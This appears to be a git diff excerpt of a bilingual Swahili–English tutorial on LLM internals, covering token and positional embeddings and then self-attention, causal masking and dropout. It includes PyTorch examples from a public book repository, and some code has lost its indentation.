**Token Embeddings** ni uwakilishi wa nambari wa token katika nafasi ya vector inayoendelea. Kila token katika msamiati inahusishwa na vector ya kipekee ya vipimo vilivyowekwa. Vectors hizi zinakamata taarifa za semantiki na sintaksia kuhusu token, na kuwezesha mfano kuelewa uhusiano na mifumo katika data.
 | 
			
		||||
 | 
			
		||||
- **Ukubwa wa Msamiati:** Jumla ya idadi ya token za kipekee (mfano, maneno, sehemu za maneno) katika msamiati wa mfano.
 | 
			
		||||
- **Vipimo vya Embedding:** Idadi ya thamani za nambari (vipimo) katika vector ya kila token. Vipimo vya juu vinaweza kukamata taarifa za kina zaidi lakini vinahitaji rasilimali zaidi za kompyuta.
 | 
			
		||||
 | 
			
		||||
**Mfano:**
 | 
			
		||||
 | 
			
		||||
- **Ukubwa wa Msamiati:** token 6 \[1, 2, 3, 4, 5, 6]
 | 
			
		||||
- **Vipimo vya Embedding:** 3 (x, y, z)
 | 
			
		||||
 | 
			
		||||
### **Initializing Token Embeddings**
 | 
			
		||||
 | 
			
		||||
Katika mwanzo wa mafunzo, token embeddings kwa kawaida huanzishwa na thamani ndogo za bahati nasibu. Thamani hizi za awali zinarekebishwa (zinaboreshwa) wakati wa mafunzo ili kuwakilisha vyema maana za token kulingana na data ya mafunzo.
 | 
			
		||||
 | 
			
		||||
**Mfano wa PyTorch:**
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
 | 
			
		||||
# Set a random seed for reproducibility
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
# Create an embedding layer with 6 tokens and 3 dimensions
 | 
			
		||||
embedding_layer = torch.nn.Embedding(6, 3)
 | 
			
		||||
 | 
			
		||||
# Display the initial weights (embeddings)
 | 
			
		||||
print(embedding_layer.weight)
 | 
			
		||||
```
 | 
			
		||||
**Matokeo:**
 | 
			
		||||
```lua
 | 
			
		||||
luaCopy codeParameter containing:
 | 
			
		||||
tensor([[ 0.3374, -0.1778, -0.1690],
 | 
			
		||||
[ 0.9178,  1.5810,  1.3010],
 | 
			
		||||
[ 1.2753, -0.2010, -0.1606],
 | 
			
		||||
[-0.4015,  0.9666, -1.1481],
 | 
			
		||||
[-1.1589,  0.3255, -0.6315],
 | 
			
		||||
[-2.8400, -0.7849, -1.4096]], requires_grad=True)
 | 
			
		||||
```
 | 
			
		||||
**Maelezo:**
 | 
			
		||||
 | 
			
		||||
- Kila safu inawakilisha token katika msamiati.
 | 
			
		||||
- Kila nguzo inawakilisha kipimo katika vector ya embedding.
 | 
			
		||||
- Kwa mfano, token iliyo katika index `3` ina vector ya embedding `[-0.4015, 0.9666, -1.1481]`.
 | 
			
		||||
 | 
			
		||||
**Kupata Embedding ya Token:**
 | 
			
		||||
```python
 | 
			
		||||
# Retrieve the embedding for the token at index 3
 | 
			
		||||
token_index = torch.tensor([3])
 | 
			
		||||
print(embedding_layer(token_index))
 | 
			
		||||
```
 | 
			
		||||
**Matokeo:**
 | 
			
		||||
```lua
 | 
			
		||||
tensor([[-0.4015,  0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
 | 
			
		||||
```
 | 
			
		||||
**Tafsiri:**
 | 
			
		||||
 | 
			
		||||
- Token katika index `3` inawakilishwa na vector `[-0.4015, 0.9666, -1.1481]`.
 | 
			
		||||
- Hizi ni thamani zinazoweza kufundishwa ambazo modeli itazirekebisha wakati wa mafunzo ili kuwakilisha muktadha na maana ya token vizuri zaidi.
 | 
			
		||||
 | 
			
		||||
### **Jinsi Token Embeddings Zinavyofanya Kazi Wakati wa Mafunzo**
 | 
			
		||||
 | 
			
		||||
Wakati wa mafunzo, kila token katika data ya ingizo inabadilishwa kuwa vector yake inayolingana ya embedding. Vectors hizi kisha zinatumika katika hesabu mbalimbali ndani ya modeli, kama vile mifumo ya umakini na tabaka za mtandao wa neva.
 | 
			
		||||
 | 
			
		||||
**Mfano wa Hali:**
 | 
			
		||||
 | 
			
		||||
- **Batch Size:** 8 (idadi ya sampuli zinazoshughulikiwa kwa wakati mmoja)
 | 
			
		||||
- **Max Sequence Length:** 4 (idadi ya token kwa sampuli)
 | 
			
		||||
- **Embedding Dimensions:** 256
 | 
			
		||||
 | 
			
		||||
**Muundo wa Data:**
 | 
			
		||||
 | 
			
		||||
- Kila batch inawakilishwa kama tensor ya 3D yenye umbo `(batch_size, max_length, embedding_dim)`.
 | 
			
		||||
- Kwa mfano letu, umbo litakuwa `(8, 4, 256)`.
 | 
			
		||||
 | 
			
		||||
**Uonyeshaji:**
 | 
			
		||||
```css
 | 
			
		||||
cssCopy codeBatch
 | 
			
		||||
┌─────────────┐
 | 
			
		||||
│ Sample 1    │
 | 
			
		||||
│ ┌─────┐     │
 | 
			
		||||
│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
 | 
			
		||||
│ │ 1   │     │
 | 
			
		||||
│ │...  │     │
 | 
			
		||||
│ │Token│     │
 | 
			
		||||
│ │ 4   │     │
 | 
			
		||||
│ └─────┘     │
 | 
			
		||||
│ Sample 2    │
 | 
			
		||||
│ ┌─────┐     │
 | 
			
		||||
│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
 | 
			
		||||
│ │ 1   │     │
 | 
			
		||||
│ │...  │     │
 | 
			
		||||
│ │Token│     │
 | 
			
		||||
│ │ 4   │     │
 | 
			
		||||
│ └─────┘     │
 | 
			
		||||
│ ...         │
 | 
			
		||||
│ Sample 8    │
 | 
			
		||||
│ ┌─────┐     │
 | 
			
		||||
│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
 | 
			
		||||
│ │ 1   │     │
 | 
			
		||||
│ │...  │     │
 | 
			
		||||
│ │Token│     │
 | 
			
		||||
│ │ 4   │     │
 | 
			
		||||
│ └─────┘     │
 | 
			
		||||
└─────────────┘
 | 
			
		||||
```
 | 
			
		||||
**Maelezo:**
 | 
			
		||||
 | 
			
		||||
- Kila token katika mfuatano inawakilishwa na vector ya vipimo 256.
 | 
			
		||||
- Mfano unashughulikia embeddings hizi ili kujifunza mifumo ya lugha na kutoa makadirio.
 | 
			
		||||
 | 
			
		||||
## **Embeddings za Nafasi: Kuongeza Muktadha kwa Embeddings za Token**
 | 
			
		||||
 | 
			
		||||
Wakati embeddings za token zinashika maana ya tokens binafsi, hazijajumuisha kwa asili nafasi ya tokens ndani ya mfuatano. Kuelewa mpangilio wa tokens ni muhimu kwa ufahamu wa lugha. Hapa ndipo **embeddings za nafasi** zinapokuja.
 | 
			
		||||
 | 
			
		||||
### **Kwa Nini Embeddings za Nafasi Zinahitajika:**
 | 
			
		||||
 | 
			
		||||
- **Mpangilio wa Token Una umuhimu:** Katika sentensi, maana mara nyingi inategemea mpangilio wa maneno. Kwa mfano, "Paka aliketi kwenye mkeka" dhidi ya "Mkeka ulikaa juu ya paka."
 | 
			
		||||
- **Kikomo cha Embedding:** Bila taarifa za nafasi, mfano unachukulia tokens kama "mfuko wa maneno," ukipuuzia mfuatano wao.
 | 
			
		||||
 | 
			
		||||
### **Aina za Embeddings za Nafasi:**
 | 
			
		||||
 | 
			
		||||
1. **Embeddings za Nafasi za Kipekee:**
 | 
			
		||||
- Kutoa vector ya nafasi ya kipekee kwa kila nafasi katika mfuatano.
 | 
			
		||||
- **Mfano:** Token ya kwanza katika mfuatano wowote ina embedding ya nafasi sawa, token ya pili ina nyingine, na kadhalika.
 | 
			
		||||
- **Inatumika na:** Mfano wa GPT wa OpenAI.
 | 
			
		||||
2. **Embeddings za Nafasi za Kihusiano:**
 | 
			
		||||
- Kuandika umbali wa kihusiano kati ya tokens badala ya nafasi zao za kipekee.
 | 
			
		||||
- **Mfano:** Kuonyesha jinsi tokens mbili zilivyo mbali, bila kujali nafasi zao za kipekee katika mfuatano.
 | 
			
		||||
- **Inatumika na:** Mifano kama Transformer-XL na baadhi ya toleo za BERT.
 | 
			
		||||
 | 
			
		||||
### **Jinsi Embeddings za Nafasi Zinavyounganishwa:**
 | 
			
		||||
 | 
			
		||||
- **Vipimo Vilevile:** Embeddings za nafasi zina vipimo sawa na embeddings za token.
 | 
			
		||||
- **Kuongeza:** Zinajumuishwa na embeddings za token, zikichanganya utambulisho wa token na taarifa za nafasi bila kuongeza vipimo vya jumla.
 | 
			
		||||
 | 
			
		||||
**Mfano wa Kuongeza Embeddings za Nafasi:**
 | 
			
		||||
 | 
			
		||||
Kiwango cha embedding cha token ni `[0.5, -0.2, 0.1]` na kiwango chake cha embedding cha nafasi ni `[0.1, 0.3, -0.1]`. Embedding iliyounganishwa inayotumika na mfano ingekuwa:
 | 
			
		||||
```css
 | 
			
		||||
Combined Embedding = Token Embedding + Positional Embedding
 | 
			
		||||
= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
 | 
			
		||||
= [0.6, 0.1, 0.0]
 | 
			
		||||
```
 | 
			
		||||
**Faida za Positional Embeddings:**
 | 
			
		||||
 | 
			
		||||
- **Uelewa wa Muktadha:** Mfano unaweza kutofautisha kati ya tokens kulingana na nafasi zao.
 | 
			
		||||
- **Uelewa wa Mfuatano:** Inamwezesha mfano kuelewa sarufi, sintaksia, na maana zinazotegemea muktadha.
 | 
			
		||||
 | 
			
		||||
## Mfano wa Kanuni
 | 
			
		||||
 | 
			
		||||
Ikifuatiwa na mfano wa kanuni kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
# Use previous code...
 | 
			
		||||
 | 
			
		||||
# Create dimensional emdeddings
 | 
			
		||||
"""
 | 
			
		||||
BPE uses a vocabulary of 50257 words
 | 
			
		||||
Let's supose we want to use 256 dimensions (instead of the millions used by LLMs)
 | 
			
		||||
"""
 | 
			
		||||
 | 
			
		||||
vocab_size = 50257
 | 
			
		||||
output_dim = 256
 | 
			
		||||
token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
 | 
			
		||||
 | 
			
		||||
## Generate the dataloader like before
 | 
			
		||||
max_length = 4
 | 
			
		||||
dataloader = create_dataloader_v1(
 | 
			
		||||
raw_text, batch_size=8, max_length=max_length,
 | 
			
		||||
stride=max_length, shuffle=False
 | 
			
		||||
)
 | 
			
		||||
data_iter = iter(dataloader)
 | 
			
		||||
inputs, targets = next(data_iter)
 | 
			
		||||
 | 
			
		||||
# Apply embeddings
 | 
			
		||||
token_embeddings = token_embedding_layer(inputs)
 | 
			
		||||
print(token_embeddings.shape)
 | 
			
		||||
torch.Size([8, 4, 256]) # 8 x 4 x 256
 | 
			
		||||
 | 
			
		||||
# Generate absolute embeddings
 | 
			
		||||
context_length = max_length
 | 
			
		||||
pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)
 | 
			
		||||
 | 
			
		||||
pos_embeddings = pos_embedding_layer(torch.arange(max_length))
 | 
			
		||||
 | 
			
		||||
input_embeddings = token_embeddings + pos_embeddings
 | 
			
		||||
print(input_embeddings.shape) # torch.Size([8, 4, 256])
 | 
			
		||||
```
 | 
			
		||||
## Marejeo
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,416 +0,0 @@
 | 
			
		||||
# 4. Attention Mechanisms
 | 
			
		||||
 | 
			
		||||
## Attention Mechanisms and Self-Attention in Neural Networks
 | 
			
		||||
 | 
			
		||||
Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
 | 
			
		||||
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
 | 
			
		||||
 | 
			
		||||
### Understanding Attention Mechanisms
 | 
			
		||||
 | 
			
		||||
In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.
 | 
			
		||||
 | 
			
		||||
#### Example: Machine Translation
 | 
			
		||||
 | 
			
		||||
Consider translating the German sentence "Kannst du mir helfen diesen Satz zu übersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.
 | 
			
		||||
 | 
			
		||||
### Introduction to Self-Attention
 | 
			
		||||
 | 
			
		||||
Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.
 | 
			
		||||
 | 
			
		||||
#### Key Concepts
 | 
			
		||||
 | 
			
		||||
- **Tokens**: Vipengele vya kibinafsi vya mfuatano wa ingizo (e.g., maneno katika sentensi).
 | 
			
		||||
- **Embeddings**: Uwakilishi wa vector wa tokens, ukichukua taarifa za maana.
 | 
			
		||||
- **Attention Weights**: Thamani zinazotathmini umuhimu wa kila token kulingana na wengine.
 | 
			
		||||
 | 
			
		||||
### Calculating Attention Weights: A Step-by-Step Example
 | 
			
		||||
 | 
			
		||||
Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding:
 | 
			
		||||
 | 
			
		||||
- **Hello**: `[0.34, 0.22, 0.54]`
 | 
			
		||||
- **shiny**: `[0.53, 0.34, 0.98]`
 | 
			
		||||
- **sun**: `[0.29, 0.54, 0.93]`
 | 
			
		||||
 | 
			
		||||
Our goal is to compute the **context vector** for the word **"shiny"** using self-attention.
 | 
			
		||||
 | 
			
		||||
#### Step 1: Compute Attention Scores
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Just multiply each dimension value of the query with the relevant one of each token and add the results. You get 1 value per pair of tokens.
 | 
			
		||||
 | 
			
		||||
For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings.
 | 
			
		||||
 | 
			
		||||
**Attention Score between "Hello" and "shiny"**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**Attention Score between "shiny" and "shiny"**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**Attention Score between "sun" and "shiny"**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
#### Step 2: Normalize Attention Scores to Obtain Attention Weights
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Don't get lost in the mathematical terms, the goal of this function is simple, normalize all the weights so **they sum 1 in total**.
 | 
			
		||||
>
 | 
			
		||||
> Moreover, **softmax** function is used because it accentuates differences due to the exponential part, making easier to detect useful values.
 | 
			
		||||
 | 
			
		||||
Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1.
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating the exponentials:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating the sum:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating attention weights:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
#### Step 3: Compute the Context Vector
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)
 | 
			
		||||
 | 
			
		||||
The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating each component:
 | 
			
		||||
 | 
			
		||||
- **Weighted Embedding of "Hello"**:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
- **Weighted Embedding of "shiny"**:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
- **Weighted Embedding of "sun"**:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Summing the weighted embeddings:
 | 
			
		||||
 | 
			
		||||
`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
 | 
			
		||||
 | 
			
		||||
**This context vector represents the enriched embedding for the word "shiny," incorporating information from all words in the sentence.**
 | 
			
		||||
 | 
			
		||||
### Summary of the Process
 | 
			
		||||
 | 
			
		||||
1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence.
 | 
			
		||||
2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1.
 | 
			
		||||
3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results.
 | 
			
		||||
 | 
			
		||||
## Self-Attention with Trainable Weights
 | 
			
		||||
 | 
			
		||||
In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
The query is the data to use like before, while the keys and values matrices are just random-trainable matrices.
 | 
			
		||||
 | 
			
		||||
#### Step 1: Compute Queries, Keys, and Values
 | 
			
		||||
 | 
			
		||||
Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
These matrices transform the original embeddings into a new space suitable for computing attention.
 | 
			
		||||
 | 
			
		||||
**Example**
 | 
			
		||||
 | 
			
		||||
Assuming:
 | 
			
		||||
 | 
			
		||||
- Input dimension `din=3` (embedding size)
 | 
			
		||||
- Output dimension `dout=2` (desired dimension for queries, keys, and values)
 | 
			
		||||
 | 
			
		||||
Initialize the weight matrices:
 | 
			
		||||
```python
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
 | 
			
		||||
d_in = 3
 | 
			
		||||
d_out = 2
 | 
			
		||||
 | 
			
		||||
W_query = nn.Parameter(torch.rand(d_in, d_out))
 | 
			
		||||
W_key = nn.Parameter(torch.rand(d_in, d_out))
 | 
			
		||||
W_value = nn.Parameter(torch.rand(d_in, d_out))
 | 
			
		||||
```
 | 
			
		||||
Hesabu maswali, funguo, na thamani:
 | 
			
		||||
```python
 | 
			
		||||
queries = torch.matmul(inputs, W_query)
 | 
			
		||||
keys = torch.matmul(inputs, W_key)
 | 
			
		||||
values = torch.matmul(inputs, W_value)
 | 
			
		||||
```
 | 
			
		||||
#### Step 2: Compute Scaled Dot-Product Attention
 | 
			
		||||
 | 
			
		||||
**Compute Attention Scores**
 | 
			
		||||
 | 
			
		||||
Kama ilivyo katika mfano wa awali, lakini wakati huu, badala ya kutumia thamani za vipimo vya tokens, tunatumia matrix ya funguo ya token (iliyohesabiwa tayari kwa kutumia vipimo):. Hivyo, kwa kila query `qi` na funguo `kj`:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**Scale the Scores**
 | 
			
		||||
 | 
			
		||||
Ili kuzuia dot products kuwa kubwa sana, ziongeze kwa mzizi wa mraba wa kipimo cha funguo `dk`:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Alama inagawanywa kwa mzizi wa mraba wa vipimo kwa sababu dot products zinaweza kuwa kubwa sana na hii inasaidia kudhibitiwa.
 | 
			
		||||
 | 
			
		||||
**Apply Softmax to Obtain Attention Weights:** Kama katika mfano wa awali, normalize thamani zote ili zijumuishe 1.
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
#### Step 3: Compute Context Vectors
 | 
			
		||||
 | 
			
		||||
Kama katika mfano wa awali, jumlisha tu matrix zote za thamani ukizidisha kila moja kwa uzito wake wa umakini:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
### Code Example
 | 
			
		||||
 | 
			
		||||
Grabbing an example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) you can check this class that implements the self-attendant functionality we talked about:
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
 | 
			
		||||
inputs = torch.tensor(
 | 
			
		||||
[[0.43, 0.15, 0.89], # Your     (x^1)
 | 
			
		||||
[0.55, 0.87, 0.66], # journey  (x^2)
 | 
			
		||||
[0.57, 0.85, 0.64], # starts   (x^3)
 | 
			
		||||
[0.22, 0.58, 0.33], # with     (x^4)
 | 
			
		||||
[0.77, 0.25, 0.10], # one      (x^5)
 | 
			
		||||
[0.05, 0.80, 0.55]] # step     (x^6)
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
class SelfAttention_v2(nn.Module):
 | 
			
		||||
 | 
			
		||||
def __init__(self, d_in, d_out, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
keys = self.W_key(x)
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
attn_scores = queries @ keys.T
 | 
			
		||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
 | 
			
		||||
context_vec = attn_weights @ values
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
d_in=3
 | 
			
		||||
d_out=2
 | 
			
		||||
torch.manual_seed(789)
 | 
			
		||||
sa_v2 = SelfAttention_v2(d_in, d_out)
 | 
			
		||||
print(sa_v2(inputs))
 | 
			
		||||
```
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Kumbuka kwamba badala ya kuanzisha matrices na thamani za nasibu, `nn.Linear` inatumika kuashiria uzito wote kama vigezo vya kufundisha.
 | 
			
		||||
 | 
			
		||||
## Causal Attention: Kuficha Maneno ya Baadaye
 | 
			
		||||
 | 
			
		||||
Kwa LLMs tunataka mfano uzingatie tu tokens ambazo zinaonekana kabla ya nafasi ya sasa ili **kutabiri token inayofuata**. **Causal attention**, pia inajulikana kama **masked attention**, inafanikiwa kwa kubadilisha mekanizma ya attention ili kuzuia ufikiaji wa tokens za baadaye.
 | 
			
		||||
 | 
			
		||||
### Kutumia Mask ya Causal Attention
 | 
			
		||||
 | 
			
		||||
Ili kutekeleza causal attention, tunatumia mask kwa alama za attention **kabla ya operesheni ya softmax** ili zile zilizobaki bado zikusanye 1. Mask hii inaweka alama za attention za tokens za baadaye kuwa negative infinity, kuhakikisha kwamba baada ya softmax, uzito wao wa attention ni sifuri.
 | 
			
		||||
 | 
			
		||||
**Hatua**
 | 
			
		||||
 | 
			
		||||
1. **Hesabu Alama za Attention**: Kama ilivyokuwa hapo awali.
 | 
			
		||||
2. **Tumia Mask**: Tumia matrix ya juu ya pembeni iliyojaa negative infinity juu ya diagonal.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf')
 | 
			
		||||
masked_scores = attention_scores + mask
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
3. **Tumia Softmax**: Hesabu uzito wa attention kwa kutumia alama zilizofichwa.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
attention_weights = torch.softmax(masked_scores, dim=-1)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Kuficha Uzito wa Ziada wa Attention kwa Kutumia Dropout
 | 
			
		||||
 | 
			
		||||
Ili **kuzuia overfitting**, tunaweza kutumia **dropout** kwa uzito wa attention baada ya operesheni ya softmax. Dropout **hufanya baadhi ya uzito wa attention kuwa sifuri kwa nasibu** wakati wa mafunzo.
 | 
			
		||||
```python
 | 
			
		||||
dropout = nn.Dropout(p=0.5)
 | 
			
		||||
attention_weights = dropout(attention_weights)
 | 
			
		||||
```
 | 
			
		||||
Kawaida ya kuacha ni takriban 10-20%.
 | 
			
		||||
 | 
			
		||||
### Mfano wa Code
 | 
			
		||||
 | 
			
		||||
Mfano wa code kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
 | 
			
		||||
inputs = torch.tensor(
 | 
			
		||||
[[0.43, 0.15, 0.89], # Your     (x^1)
 | 
			
		||||
[0.55, 0.87, 0.66], # journey  (x^2)
 | 
			
		||||
[0.57, 0.85, 0.64], # starts   (x^3)
 | 
			
		||||
[0.22, 0.58, 0.33], # with     (x^4)
 | 
			
		||||
[0.77, 0.25, 0.10], # one      (x^5)
 | 
			
		||||
[0.05, 0.80, 0.55]] # step     (x^6)
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
batch = torch.stack((inputs, inputs), dim=0)
 | 
			
		||||
print(batch.shape)
 | 
			
		||||
 | 
			
		||||
class CausalAttention(nn.Module):
 | 
			
		||||
 | 
			
		||||
def __init__(self, d_in, d_out, context_length,
 | 
			
		||||
dropout, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.d_out = d_out
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.dropout = nn.Dropout(dropout)
 | 
			
		||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
b, num_tokens, d_in = x.shape
 | 
			
		||||
# b is the num of batches
 | 
			
		||||
# num_tokens is the number of tokens per batch
 | 
			
		||||
# d_in is the dimensions er token
 | 
			
		||||
 | 
			
		||||
keys = self.W_key(x) # This generates the keys of the tokens
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
 | 
			
		||||
attn_scores.masked_fill_(  # New, _ ops are in-place
 | 
			
		||||
self.mask.bool()[:num_tokens, :num_tokens], -torch.inf)  # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
 | 
			
		||||
attn_weights = torch.softmax(
 | 
			
		||||
attn_scores / keys.shape[-1]**0.5, dim=-1
 | 
			
		||||
)
 | 
			
		||||
attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
context_vec = attn_weights @ values
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
context_length = batch.shape[1]
 | 
			
		||||
d_in = 3
 | 
			
		||||
d_out = 2
 | 
			
		||||
ca = CausalAttention(d_in, d_out, context_length, 0.0)
 | 
			
		||||
 | 
			
		||||
context_vecs = ca(batch)
 | 
			
		||||
 | 
			
		||||
print(context_vecs)
 | 
			
		||||
print("context_vecs.shape:", context_vecs.shape)
 | 
			
		||||
```
 | 
			
		||||
## Kuongeza Umakini wa Kichwa Kimoja hadi Umakini wa Vichwa Vingi
 | 
			
		||||
 | 
			
		||||
**Umakini wa vichwa vingi** kwa maneno ya vitendo unajumuisha kutekeleza **matukio mengi** ya kazi ya umakini wa ndani kila moja ikiwa na **uzito wake mwenyewe** ili vektori tofauti za mwisho zihesabiwe.
 | 
			
		||||
 | 
			
		||||
### Mfano wa Kanuni
 | 
